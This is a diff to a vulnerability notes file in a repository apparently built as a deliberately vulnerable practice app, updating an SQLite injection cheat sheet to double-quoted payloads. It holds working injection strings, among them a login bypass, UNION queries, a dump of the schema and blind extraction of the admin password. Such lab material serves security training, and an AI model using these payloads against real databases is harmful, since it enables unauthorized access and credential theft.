D4rkm4g1c/DarkVault/VULNERABILITIES.md

 ### SQLi Cheat Sheet

-Common SQL injection payloads for SQLite:
+Common SQL injection payloads for SQLite (updated for double quotes):
 ```
-' OR 1=1 --
+" OR 1=1 --
-' UNION SELECT 1,2,3 --
+" UNION SELECT 1,2,3 --
-' UNION SELECT sql,NULL,NULL FROM sqlite_master --
+" UNION SELECT sql,NULL,NULL FROM sqlite_master --
-' AND (SELECT 1 FROM users WHERE username='admin' AND substr(password,1,1)='a') --
+" AND (SELECT 1 FROM users WHERE username="admin" AND substr(password,1,1)="a") --
 ```

 ### XSS Cheat Sheet